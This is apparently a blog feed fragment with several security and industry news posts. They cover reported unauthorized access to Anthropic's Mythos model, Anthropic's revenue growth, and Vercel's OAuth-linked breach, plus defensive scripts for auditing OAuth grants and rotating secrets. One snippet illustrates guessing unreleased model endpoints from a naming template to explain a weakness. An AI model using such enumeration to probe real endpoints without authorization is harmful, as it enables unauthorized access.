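&lt;p&gt;At that pricing, the cost of a single large job is easy to estimate. The token counts below are hypothetical:&lt;/p&gt;

```python
# Cost estimate at the stated $25 / $125 per million input/output tokens.
# The example token counts are hypothetical, not from any real workload.

INPUT_PER_M = 25.0    # USD per million input tokens (stated pricing)
OUTPUT_PER_M = 125.0  # USD per million output tokens (stated pricing)

def job_cost(input_tokens, output_tokens):
    return (input_tokens / 1e6) * INPUT_PER_M + (output_tokens / 1e6) * OUTPUT_PER_M

# e.g. feeding a 2M-token codebase and getting a 100K-token report back:
cost = job_cost(2_000_000, 100_000)
print(cost)  # about $62.50 for the whole job
```

&lt;p&gt;At tens of dollars per deep codebase analysis, the $100M credit pool goes a long way, which is part of why the access perimeter mattered so much.&lt;/p&gt;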

&lt;p&gt;The perimeter was tight by design. The news today is that it didn't hold.&lt;/p&gt;

&lt;h2&gt;How the Discord Group Got In&lt;/h2&gt;

&lt;p&gt;A "private online forum," the members of which have not been publicly identified, managed to gain access to the tool through a third-party vendor. The unauthorized group tried a number of different strategies to gain access to the model, including using "access" enjoyed by a person currently employed at a third-party contractor that works for Anthropic. &lt;a href="https://techcrunch.com/2026/04/21/unauthorized-group-has-gained-access-to-anthropics-exclusive-cyber-tool-mythos-report-claims/" rel="noopener noreferrer"&gt;TechCrunch&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Members of the group are part of a Discord channel that seeks out information about unreleased AI models. The group has been using Mythos regularly since gaining access to it, and provided evidence to Bloomberg in the form of screenshots and a live demonstration of the software (&lt;a href="https://techcrunch.com/2026/04/21/unauthorized-group-has-gained-access-to-anthropics-exclusive-cyber-tool-mythos-report-claims/" rel="noopener noreferrer"&gt;TechCrunch&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;The method they used to find the endpoint is particularly revealing. The group, which gained access on the very same day Mythos was publicly announced, "made an educated guess about the model's online location based on knowledge about the format Anthropic has used for other models." &lt;a href="https://techcrunch.com/2026/04/21/unauthorized-group-has-gained-access-to-anthropics-exclusive-cyber-tool-mythos-report-claims/" rel="noopener noreferrer"&gt;TechCrunch&lt;/a&gt; This wasn't a sophisticated breach — it was pattern recognition applied to a known naming convention. The group reportedly described themselves as being interested in exploring new models, not causing harm.&lt;/p&gt;
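To make the failure mode concrete, here is a minimal sketch of why predictable identifier schemes are guessable. Every name and the template below are invented for illustration; nothing here reflects Anthropic's actual endpoint format.

```python
# Illustrative only: all model names and the template are hypothetical.
# If past releases follow one naming template, an unreleased model's
# identifier can be guessed by enumerating candidate slots in that template.

def candidates(family: str, versions: list[str], dates: list[str]) -> list[str]:
    """Enumerate plausible IDs from an observed naming template."""
    return [f"vendor-{family}-{v}-{d}" for v in versions for d in dates]

# Two known IDs establish the pattern; a new release is then a small search.
known = ["vendor-model-3-2024-01-15", "vendor-model-3-5-2024-06-20"]
guesses = candidates("mythos", ["1", "preview"], ["2026-04-07"])
print(guesses)
```

The defense is equally simple: unreleased endpoints should carry unguessable identifiers and, more importantly, should reject requests that lack authorization regardless of whether the URL is known.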

&lt;p&gt;Anthropic said it is investigating the claims and, so far, has seen no sign that its own systems were affected — the allegation points to possible misuse of access outside Anthropic's core network, not a confirmed breach of the company's internal defenses. &lt;a href="https://www.prismnews.com/news/anthropic-probes-claims-of-unauthorized-access-to" rel="noopener noreferrer"&gt;Prism News&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Is a Bigger Deal Than It Looks
&lt;/h2&gt;

&lt;p&gt;The immediate reassurance — no core systems compromised, the group wasn't malicious — is accurate but beside the point. The problem isn't what this specific group did. It's what this incident reveals about the entire premise of Project Glasswing.&lt;/p&gt;

&lt;p&gt;Anthropic's controlled release strategy rests on the assumption that access can be meaningfully gated through vendor relationships. A small group of unauthorized users reportedly accessed Mythos on the same day Anthropic announced limited testing &lt;a href="https://www.prismnews.com/news/anthropic-probes-claims-of-unauthorized-access-to" rel="noopener noreferrer"&gt;Prism News&lt;/a&gt; — meaning the access controls failed within hours of the first public announcement, before most Glasswing partners had even begun their work. If the group could guess the model's endpoint from Anthropic's known URL patterns, so can threat actors with more resources and worse intentions.&lt;/p&gt;

&lt;p&gt;There's also a pattern here worth naming. This is the third significant information control failure at Anthropic in recent weeks. The Claude Code source leak in March exposed 512,000 lines of unobfuscated TypeScript via a missing &lt;code&gt;.npmignore&lt;/code&gt; entry. Before that, a draft blog post describing Mythos as "by far the most powerful AI model" ever built at Anthropic was left in a publicly accessible data store. That March 26 leak of draft materials — which Anthropic said resulted from human error in its content-management configuration — was actually Mythos's first public exposure. &lt;a href="https://www.prismnews.com/news/anthropic-probes-claims-of-unauthorized-access-to" rel="noopener noreferrer"&gt;Prism News&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then there's the government subplot. The National Security Agency is using Mythos Preview despite top officials at the Department of Defense — which oversees the NSA — insisting Anthropic is a "supply chain risk." The department moved in February to cut off Anthropic and force its vendors to follow suit. The military is now broadening its use of Anthropic's tools while simultaneously arguing in court that using those tools threatens U.S. national security. &lt;a href="https://www.axios.com/2026/04/19/nsa-anthropic-mythos-pentagon" rel="noopener noreferrer"&gt;Axios&lt;/a&gt; Meanwhile, CISA — the agency whose entire mandate is critical infrastructure protection — reportedly does not have access to the model. &lt;a href="https://www.axios.com/2026/04/21/cisa-anthropic-mythos-ai-security" rel="noopener noreferrer"&gt;Axios&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The entity designed to defend critical systems can't get in. A Discord group can.&lt;/p&gt;

&lt;h2&gt;
  
  
  What Anthropic Actually Said
&lt;/h2&gt;

&lt;p&gt;"We're investigating a report claiming unauthorized access to Claude Mythos Preview through one of our third-party vendor environments," an Anthropic spokesperson said. The company found no evidence that the supposedly unauthorized activity impacted Anthropic's systems at all. &lt;a href="https://techcrunch.com/2026/04/21/unauthorized-group-has-gained-access-to-anthropics-exclusive-cyber-tool-mythos-report-claims/" rel="noopener noreferrer"&gt;TechCrunch&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That's a factually careful statement. It's also a familiar shape: acknowledge the narrow, deny the broader implication. Anthropic has been here before.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Vendor Problem Nobody Wants to Solve
&lt;/h2&gt;

&lt;p&gt;The deeper structural issue is that enterprise AI deployments at frontier capability levels require trust chains that extend across dozens of organizations. Anthropic's 40-organization Glasswing rollout means 40 distinct security postures, 40 sets of contractors, and 40 potential lateral entry points for anyone who knows what they're looking for.&lt;/p&gt;

&lt;p&gt;Anthropic said it does not plan to make Mythos Preview generally available, but its eventual goal is to enable users to safely deploy Mythos-class models at scale — for cybersecurity purposes, but also for the myriad other benefits that such highly capable models will bring. &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/" rel="noopener noreferrer"&gt;Simon Willison&lt;/a&gt; That goal is legitimate. But reaching it requires solving vendor access governance at a level the industry hasn't had to reckon with before. This incident is an early indication of what the stakes look like when the effort falls short.&lt;/p&gt;

&lt;p&gt;A model capable of finding zero-days in every major operating system and browser has now been accessed by people outside the intended perimeter. The question isn't whether the Discord group caused harm. It's whether the perimeter can hold when the people on the other side are actually trying.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;The line between "interested in playing around" and "interested in breaking things" isn't enforced by intent. It's enforced by access controls. Anthropic's have now failed three times in a matter of weeks.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow for more coverage on MCP, agentic AI, and AI infrastructure.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>discuss</category>
      <category>claude</category>
    </item>
    <item>
      <title>Anthropic Just Passed OpenAI in Revenue. Here's What Actually Built That Lead.</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Mon, 20 Apr 2026 06:46:06 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/anthropic-just-passed-openai-in-revenue-heres-what-actually-built-that-lead-2kmo</link>
      <guid>https://zeroday.forem.com/om_shree_0709/anthropic-just-passed-openai-in-revenue-heres-what-actually-built-that-lead-2kmo</guid>
      <description>&lt;p&gt;A year ago, the consensus was that OpenAI had an insurmountable lead. The brand. The user base. ChatGPT with hundreds of millions of users. The head start. In April 2026, Anthropic crossed $30 billion in annualized revenue and left OpenAI's $25 billion behind — the first time any rival has led this race since ChatGPT launched in November 2022.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Number That Shocked Even the Analysts
&lt;/h2&gt;

&lt;p&gt;Anthropic's annualized revenue run-rate hit $30 billion in April 2026, officially overtaking OpenAI's $25 billion — the first time any rival has surpassed OpenAI since ChatGPT launched in 2022. &lt;a href="https://vucense.com/ai-intelligence/industry-business/anthropic-overtakes-openai-30-billion-arr-2026/" rel="noopener noreferrer"&gt;Vucense&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Epoch AI had modeled it. Analysts debated the timing. Even the most optimistic assessments put the crossover in August 2026. It happened in April. &lt;a href="https://www.saastr.com/anthropic-just-passed-openai-in-revenue-while-spending-4x-less-to-train-their-models/" rel="noopener noreferrer"&gt;SaaStr&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The trajectory itself is the story. Anthropic went from $87 million run-rate in January 2024, to $1 billion by December 2024, to $9 billion by end of 2025, to $14 billion in February 2026, to $19 billion in March, to $30 billion in April. That last sequence — $14B to $30B in roughly 8 weeks — is hard to make sense of in traditional software terms. &lt;a href="https://www.saastr.com/anthropic-just-passed-openai-in-revenue-while-spending-4x-less-to-train-their-models/" rel="noopener noreferrer"&gt;SaaStr&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For context: Salesforce took about 20 years to reach $30 billion in annual revenue. Anthropic did it in under 3 years from a standing start. &lt;a href="https://www.saastr.com/anthropic-just-passed-openai-in-revenue-while-spending-4x-less-to-train-their-models/" rel="noopener noreferrer"&gt;SaaStr&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Enterprise Bet That Everyone Underestimated
&lt;/h2&gt;

&lt;p&gt;OpenAI's revenue composition is more consumer-heavy, with ChatGPT Plus and Pro subscriptions making up a large share. Anthropic's composition runs roughly 80% enterprise — higher retention, lower churn, and contracts that expand over time rather than cancelling when novelty fades. &lt;a href="https://www.roborhythms.com/anthropic-revenue-30-billion-2026/" rel="noopener noreferrer"&gt;Robo Rhythms&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The customer numbers make this concrete. Enterprise customers spending over $1 million annually doubled to 1,000+ in under two months. Eight of the Fortune 10 are Anthropic customers. &lt;a href="https://vucense.com/ai-intelligence/industry-business/anthropic-overtakes-openai-30-billion-arr-2026/" rel="noopener noreferrer"&gt;Vucense&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the enterprise LLM API market, Anthropic accounts for 32% compared to OpenAI's 25%. Seven out of every ten new enterprise customers choose Anthropic. &lt;a href="https://www.tradingkey.com/analysis/stocks/us-stocks/261756528-anthropic-openai-ipo-tradingkey" rel="noopener noreferrer"&gt;Tradingkey&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Enterprise buyers treat a large funding round as a signal of platform stability. Companies that had been hesitant to commit multi-year API contracts moved forward after Anthropic's February 2026 Series G because Anthropic looked like it was in the race to stay. The doubling of $1M+ clients in under two months right after the Series G confirms that signal-driven buying happened at scale. &lt;a href="https://www.roborhythms.com/anthropic-revenue-30-billion-2026/" rel="noopener noreferrer"&gt;Robo Rhythms&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Claude Code: The Single Product That Changed Everything
&lt;/h2&gt;

&lt;p&gt;None of this happens without &lt;a href="https://claude.ai/code" rel="noopener noreferrer"&gt;Claude Code&lt;/a&gt;. Launched in May 2025, Claude Code reached an annualized revenue of $1 billion by November, and surpassed $2.5 billion by February 2026 — a product growing from zero to $2.5 billion in nine months. No faster case has been found in SaaS industry history. &lt;a href="https://www.kucoin.com/news/flash/anthropic-surpasses-openai-in-revenue-and-market-share" rel="noopener noreferrer"&gt;KuCoin&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Business subscriptions to Claude Code have quadrupled since the start of 2026, and enterprise use has grown to represent over half of all Claude Code revenue. &lt;a href="https://www.anthropic.com/news/anthropic-raises-30-billion-series-g-funding-380-billion-post-money-valuation" rel="noopener noreferrer"&gt;Anthropic&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Claude Code holds a 54% market share in the AI programming tool segment — far exceeding GitHub Copilot and Cursor. &lt;a href="https://www.tradingkey.com/analysis/stocks/us-stocks/261756528-anthropic-openai-ipo-tradingkey" rel="noopener noreferrer"&gt;Tradingkey&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The reason enterprises pay for it is structural, not incremental. GitHub Copilot helps you complete the next line as you write code — you're still the one doing the work. Claude Code doesn't just autocomplete; it handles entire workflows. &lt;a href="https://www.kucoin.com/news/flash/anthropic-surpasses-openai-in-revenue-and-market-share" rel="noopener noreferrer"&gt;KuCoin&lt;/a&gt; That's the difference between a feature and a budget line replacement.&lt;/p&gt;

&lt;p&gt;And Claude Code is available on every major surface. Claude is the only frontier AI model available on all three of the world's largest cloud platforms: AWS Bedrock, Google Cloud Vertex AI, and Microsoft Azure Foundry. &lt;a href="https://www.the-ai-corner.com/p/anthropic-30b-arr-passed-openai-revenue-2026" rel="noopener noreferrer"&gt;The-ai-corner&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Training Cost Gap Nobody Is Talking About Enough
&lt;/h2&gt;

&lt;p&gt;Revenue is the headline. The cost structure is the real story.&lt;/p&gt;

&lt;p&gt;OpenAI is projected to spend $125 billion per year on training by 2030. Anthropic's projection for the same period: around $30 billion. Same race. 4x difference in cost. &lt;a href="https://www.the-ai-corner.com/p/anthropic-30b-arr-passed-openai-revenue-2026" rel="noopener noreferrer"&gt;The-ai-corner&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenAI is burning approximately $17 billion in cash this year. Internal documents project a $14 billion loss for 2026. The company does not project positive free cash flow until 2029. Anthropic projects positive free cash flow by 2027 — three years ahead of its main competitor, while generating more revenue. &lt;a href="https://www.saastr.com/anthropic-just-passed-openai-in-revenue-while-spending-4x-less-to-train-their-models/" rel="noopener noreferrer"&gt;SaaStr&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A new agreement with Google and Broadcom will deliver approximately 3.5 gigawatts of next-generation TPU capacity starting in 2027. Rather than relying solely on Nvidia GPUs, Anthropic is diversifying across Google TPUs, AWS Trainium chips, and Nvidia hardware — matching workloads to the chips best suited for them. &lt;a href="https://medium.com/@david.j.sea/anthropic-just-passed-openai-in-revenue-here-is-why-it-matters-e3dd9bb04069" rel="noopener noreferrer"&gt;Medium&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Anthropic is investing its revenue advantage into infrastructure before it needs it. That's a different kind of discipline than raising $120 billion and spending it on training runs.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Is a Bigger Deal Than a Revenue Chart
&lt;/h2&gt;

&lt;p&gt;The revenue story is inseparable from Anthropic's deliberate choice to prioritise enterprise over consumers. The $30B ARR is earned by being useful to businesses, not by harvesting user attention. &lt;a href="https://vucense.com/ai-intelligence/industry-business/anthropic-overtakes-openai-30-billion-arr-2026/" rel="noopener noreferrer"&gt;Vucense&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The Pentagon labelled Anthropic a supply chain risk for refusing to arm autonomous weapons with Claude. Revenue accelerated anyway — from $19B to $30B ARR in the weeks after that clash became public. The enterprise customer base that drives Anthropic's revenue appears to have either ignored or positively responded to Anthropic's refusal to compromise. &lt;a href="https://vucense.com/ai-intelligence/industry-business/anthropic-overtakes-openai-30-billion-arr-2026/" rel="noopener noreferrer"&gt;Vucense&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One caveat worth stating plainly: OpenAI has argued that Anthropic uses a gross-revenue accounting treatment for its deals with Amazon and Google that inflates top-line figures. The real net figure, by OpenAI's accounting, would be lower. &lt;a href="https://gardenzhome.com/anthropic-revenue-breakdown-openai/" rel="noopener noreferrer"&gt;Gardenzhome&lt;/a&gt; That dispute isn't settled. But even accounting for it, the trajectory is real, the enterprise customer count is real, and the Claude Code numbers are real.&lt;/p&gt;

&lt;h2&gt;
  
  
  Availability and What It Means for Developers
&lt;/h2&gt;

&lt;p&gt;Anthropic operates its models on a diversified range of AI hardware — AWS Trainium, Google TPUs, and NVIDIA GPUs — which means it can match workloads to the chips best suited for them. &lt;a href="https://www.anthropic.com/news/anthropic-raises-30-billion-series-g-funding-380-billion-post-money-valuation" rel="noopener noreferrer"&gt;Anthropic&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The IPO question is now live. Anthropic is targeting October 2026, aiming to raise $60B+ at a $380B valuation. No S-1 has been filed. The timeline is subject to market conditions and the SEC's review of accounting methodology questions. &lt;a href="https://vucense.com/ai-intelligence/industry-business/anthropic-overtakes-openai-30-billion-arr-2026/" rel="noopener noreferrer"&gt;Vucense&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Anthropic's $30 billion run rate exceeds the trailing twelve-month revenues of all but approximately 130 S&amp;amp;P 500 companies. A company that was essentially pre-revenue in early 2024 now out-earns most of the Fortune 500. &lt;a href="https://medium.com/@david.j.sea/anthropic-just-passed-openai-in-revenue-here-is-why-it-matters-e3dd9bb04069" rel="noopener noreferrer"&gt;Medium&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The company that left OpenAI to build AI more carefully just built a bigger business doing it. That's not an accident — it's a thesis proving out in real time. The question now isn't whether Anthropic belongs in the same conversation as OpenAI. It's whether the enterprise-first, developer-first model it validated is the one the rest of the industry will be chasing for the next decade.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow for more coverage on MCP, agentic AI, and AI infrastructure.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>productivity</category>
      <category>security</category>
      <category>discuss</category>
    </item>
    <item>
      <title>Vercel Just Confirmed a Security Breach. Here's What Actually Got Exposed — and Why It's Bigger Than One Company.</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Mon, 20 Apr 2026 00:42:45 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/vercel-just-confirmed-a-security-breach-heres-what-actually-got-exposed-and-why-its-bigger-pon</link>
      <guid>https://zeroday.forem.com/om_shree_0709/vercel-just-confirmed-a-security-breach-heres-what-actually-got-exposed-and-why-its-bigger-pon</guid>
      <description>&lt;p&gt;Vercel is the deployment layer for a meaningful percentage of the modern web. That's exactly what makes yesterday's confirmed breach something every developer should understand, not just Vercel customers.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem It's Solving for Attackers
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://vercel.com" rel="noopener noreferrer"&gt;Vercel&lt;/a&gt; is a cloud platform that provides hosting and deployment infrastructure for developers, with a strong focus on JavaScript frameworks. The company is known for developing &lt;a href="https://nextjs.org" rel="noopener noreferrer"&gt;Next.js&lt;/a&gt;, a widely used React framework, and for offering services such as serverless functions, edge computing, and CI/CD pipelines that enable developers to build, preview, and deploy applications. &lt;a href="https://www.bleepingcomputer.com/news/security/vercel-confirms-breach-as-hackers-claim-to-be-selling-stolen-data/" rel="noopener noreferrer"&gt;Bleeping Computer&lt;/a&gt; In short: Vercel sits at the center of how thousands of startups and enterprises ship code. That's not an incidental detail. That's exactly why it became a target.&lt;/p&gt;

&lt;p&gt;On April 19, 2026, Vercel published a security bulletin confirming that the company detected unauthorized access and has since engaged external incident response experts to investigate and contain the breach. Law enforcement has also been notified, and the company says it is continuing its forensic analysis while maintaining service availability. &lt;a href="https://cyberinsider.com/vercel-confirms-security-incident-as-hackers-claim-to-sell-internal-access/" rel="noopener noreferrer"&gt;CyberInsider&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How the Attack Actually Happened
&lt;/h2&gt;

&lt;p&gt;This wasn't a brute-force attack on Vercel's perimeter. The entry point was far more insidious — and a warning for every engineering team running a modern SaaS stack.&lt;/p&gt;

&lt;p&gt;Vercel's investigation revealed that the incident originated from a small, third-party AI tool whose Google Workspace OAuth app was the subject of a broader compromise, potentially affecting its hundreds of users across many organizations. &lt;a href="https://vercel.com/kb/bulletin/vercel-april-2026-security-incident" rel="noopener noreferrer"&gt;Vercel&lt;/a&gt; Vercel has not publicly named the specific tool; The Verge likewise reported that the company has not disclosed which third-party AI vendor served as the attack vector. &lt;a href="https://startupfortune.com/vercel-breach-exposes-ai-tool-supply-chain-risk-ahead-of-ipo/" rel="noopener noreferrer"&gt;Startup Fortune&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The architecture of the attack matters here. Attackers do not always need to smash through a front door when they can slip in through a trusted integration. Some reporting said the intrusion may have started through a compromised third-party AI tool linked to Google Workspace, rather than a direct attack on Vercel itself. &lt;a href="https://www.prismnews.com/news/hackers-claim-vercel-breach-leak-employee-data-and-seek" rel="noopener noreferrer"&gt;Prism News&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once inside, the blast radius expanded fast. Developer Theo Browne shared additional details, noting that Vercel's Linear and GitHub integrations bore the brunt of the attack. &lt;a href="https://tech.yahoo.com/cybersecurity/articles/vercel-security-breach-raises-concerns-164955320.html" rel="noopener noreferrer"&gt;Yahoo!&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What Teams Are Actually Dealing With Right Now
&lt;/h2&gt;

&lt;p&gt;Here's what got exposed, based on what's been confirmed and what threat actors are claiming — those are two different things worth keeping separate.&lt;/p&gt;

&lt;p&gt;A person claiming to be a member of ShinyHunters posted a file containing 580 employee records, including names, Vercel email addresses, account status, and activity timestamps. The same actor claimed access to internal deployments, API keys, NPM tokens, GitHub tokens, source code, and database data. Vercel has not independently verified those assertions. &lt;a href="https://www.prismnews.com/news/hackers-claim-vercel-breach-leak-employee-data-and-seek" rel="noopener noreferrer"&gt;Prism News&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Notably, while the hacker claims to be part of the ShinyHunters group, threat actors linked to recent attacks attributed to the ShinyHunters extortion gang have denied to BleepingComputer that they are involved in this incident. &lt;a href="https://www.bleepingcomputer.com/news/security/vercel-confirms-breach-as-hackers-claim-to-be-selling-stolen-data/" rel="noopener noreferrer"&gt;Bleeping Computer&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The ransom demand adds another layer. In messages shared on Telegram, the threat actor claimed they were in contact with Vercel regarding the incident and that they discussed an alleged ransom demand of $2 million. &lt;a href="https://www.bleepingcomputer.com/news/security/vercel-confirms-breach-as-hackers-claim-to-be-selling-stolen-data/" rel="noopener noreferrer"&gt;Bleeping Computer&lt;/a&gt; The group is offering what they describe as access keys, source code, and database contents from Vercel, asking $2 million, with an initial payment of $500,000 in Bitcoin. &lt;a href="https://techweez.com/2026/04/19/vercel-data-breach-third-party-ai-tool/" rel="noopener noreferrer"&gt;Techweez&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;On the customer side, the immediate concern is environment variables — the configuration values your app uses at runtime, including API keys, database credentials, and signing tokens. Anything that wasn't marked sensitive should be treated as compromised and rotated immediately. &lt;a href="https://techweez.com/2026/04/19/vercel-data-breach-third-party-ai-tool/" rel="noopener noreferrer"&gt;Techweez&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;However, environment variables marked as "sensitive" within the platform remained protected. &lt;a href="https://tech.yahoo.com/cybersecurity/articles/vercel-security-breach-raises-concerns-164955320.html" rel="noopener noreferrer"&gt;Yahoo!&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Is a Bigger Deal Than One Breach
&lt;/h2&gt;

&lt;p&gt;The reason this incident matters beyond Vercel's own customer list comes down to two words: supply chain.&lt;/p&gt;

&lt;p&gt;What makes the claim worth paying attention to is the scale ShinyHunters is alluding to. Vercel hosts Next.js, which reportedly sees around 6 million weekly downloads. The group suggests that access to Vercel's internals could enable a supply chain attack — essentially, tampering with packages that millions of developers download and run in their own software. &lt;a href="https://techweez.com/2026/04/19/vercel-data-breach-third-party-ai-tool/" rel="noopener noreferrer"&gt;Techweez&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If even part of that access turns out to be real, the fallout could extend well beyond employee privacy. Secrets and tokens can be reused to reach build systems, package registries, and source repositories, which is why researchers warned that the incident could become a supply-chain problem for startups, enterprises, and ordinary users relying on apps hosted or deployed through Vercel, including Next.js projects. &lt;a href="https://www.prismnews.com/news/hackers-claim-vercel-breach-leak-employee-data-and-seek" rel="noopener noreferrer"&gt;Prism News&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For crypto and Web3 developers specifically, the situation is acute. Many crypto and Web3 frontends deploy on Vercel, from wallet connectors to decentralized application interfaces. Projects storing API keys, private RPC endpoints, or wallet-related secrets in non-sensitive environment variables face potential exposure risk. The breach does not threaten blockchains or smart contracts directly, as those operate independently of frontend hosting. However, compromised deployment pipelines could theoretically allow build tampering for affected accounts. &lt;a href="https://tech.yahoo.com/cybersecurity/articles/vercel-security-breach-raises-concerns-164955320.html" rel="noopener noreferrer"&gt;Yahoo!&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And then there's the IPO angle. This breach lands at a brutal moment for Vercel's business trajectory. Reports from just days earlier highlighted a planned IPO following a reported 240% revenue surge, driven largely by enterprise adoption of AI-powered deployment workflows. Security incidents are notoriously damaging during a quiet period, when companies are legally restricted in how they can communicate with investors and the public. &lt;a href="https://startupfortune.com/vercel-breach-exposes-ai-tool-supply-chain-risk-ahead-of-ipo/" rel="noopener noreferrer"&gt;Startup Fortune&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Availability and Access: What You Should Do Right Now
&lt;/h2&gt;

&lt;p&gt;Vercel's guidance to customers covers several concrete steps: review account and environment activity logs for suspicious behavior, rotate environment variables and API keys, and leverage built-in features for managing sensitive variables. &lt;a href="https://trilogyai.substack.com/p/vercel-has-a-confirmed-breach" rel="noopener noreferrer"&gt;Substack&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Vercel has also rolled out updates to its dashboard, including an overview page of environment variables and an improved interface for managing sensitive environment variables. &lt;a href="https://www.bleepingcomputer.com/news/security/vercel-confirms-breach-as-hackers-claim-to-be-selling-stolen-data/" rel="noopener noreferrer"&gt;Bleeping Computer&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Vercel is publishing an IOC (indicator of compromise) to support the wider community in investigating and vetting potential malicious activity. The company recommends that Google Workspace administrators and Google account owners check for usage of the compromised app immediately. &lt;a href="https://vercel.com/kb/bulletin/vercel-april-2026-security-incident" rel="noopener noreferrer"&gt;Vercel&lt;/a&gt;&lt;/p&gt;
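For Workspace admins, that check amounts to enumerating third-party OAuth grants and matching them against the published IOCs. A minimal sketch, assuming the record shape returned by the Google Admin SDK Directory API's `tokens.list` method (fields like `clientId`, `displayText`, `scopes`); the client IDs below are hypothetical.

```python
# Sketch: flag third-party OAuth grants that match a suspect-client list.
# Record shape mirrors the Admin SDK Directory API tokens.list response;
# all client IDs and app names here are invented examples.

def risky_grants(tokens: list[dict], suspect_client_ids: set[str]) -> list[dict]:
    """Return token grants issued to client IDs on the suspect list."""
    return [t for t in tokens if t.get("clientId") in suspect_client_ids]

tokens = [
    {"clientId": "123.apps.googleusercontent.com", "displayText": "AI Notetaker",
     "scopes": ["https://www.googleapis.com/auth/drive.readonly"]},
    {"clientId": "456.apps.googleusercontent.com", "displayText": "Calendar Sync",
     "scopes": ["https://www.googleapis.com/auth/calendar"]},
]

for grant in risky_grants(tokens, {"123.apps.googleusercontent.com"}):
    print(f"revoke: {grant['displayText']}")
```

In a real audit you would pull the token list per user via the Admin SDK (and revoke matches with the corresponding delete call) rather than hard-coding records.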

&lt;p&gt;If you use Vercel: rotate every secret that wasn't explicitly marked sensitive. If your project built or deployed during the breach window, audit it regardless of whether you're in the "limited subset" Vercel is directly contacting. The investigation is still ongoing — the scope could expand.&lt;/p&gt;
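The rotation triage can be scripted. A minimal sketch, assuming the record shape of Vercel's REST API for project environment variables (each record carries a `key` and a `type`, where only type `sensitive` stayed encrypted per Vercel's bulletin); the field names and sample values are assumptions, not confirmed incident data.

```python
# Sketch: list env vars that should be treated as exposed and rotated.
# Assumes records shaped like Vercel's project env API responses,
# where "type" distinguishes sensitive from plain/encrypted values.

def needs_rotation(env_records: list[dict]) -> list[str]:
    """Keys of variables NOT stored as 'sensitive' — treat as compromised."""
    return [r["key"] for r in env_records if r.get("type") != "sensitive"]

sample = [
    {"key": "DATABASE_URL", "type": "encrypted"},
    {"key": "STRIPE_SECRET_KEY", "type": "sensitive"},
    {"key": "NEXT_PUBLIC_API_BASE", "type": "plain"},
]

print(needs_rotation(sample))
```

Anything the filter flags gets a new value at the provider, then an update in Vercel (dashboard or the `vercel env` CLI commands), then a redeploy so running functions pick up the rotated secret.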

&lt;p&gt;The deeper lesson here isn't about Vercel specifically. It's about what happens when a small, trusted AI tool with OAuth access to your workspace becomes the softest point in your entire deployment chain — and you had no way to know it was compromised until someone started selling your tokens on BreachForums.&lt;/p&gt;

&lt;p&gt;Credential hygiene and OAuth scope reviews aren't optional maintenance tasks anymore. They're the front line.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Follow for more coverage on MCP, agentic AI, and AI infrastructure.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>devops</category>
      <category>security</category>
      <category>discuss</category>
    </item>
    <item>
      <title>Anthropic Just Launched Claude Design. Here's What It Actually Changes for Non-Designers.</title>
      <dc:creator>Om Shree</dc:creator>
      <pubDate>Sun, 19 Apr 2026 05:31:03 +0000</pubDate>
      <link>https://zeroday.forem.com/om_shree_0709/anthropic-just-launched-claude-design-heres-what-it-actually-changes-for-non-designers-5e3e</link>
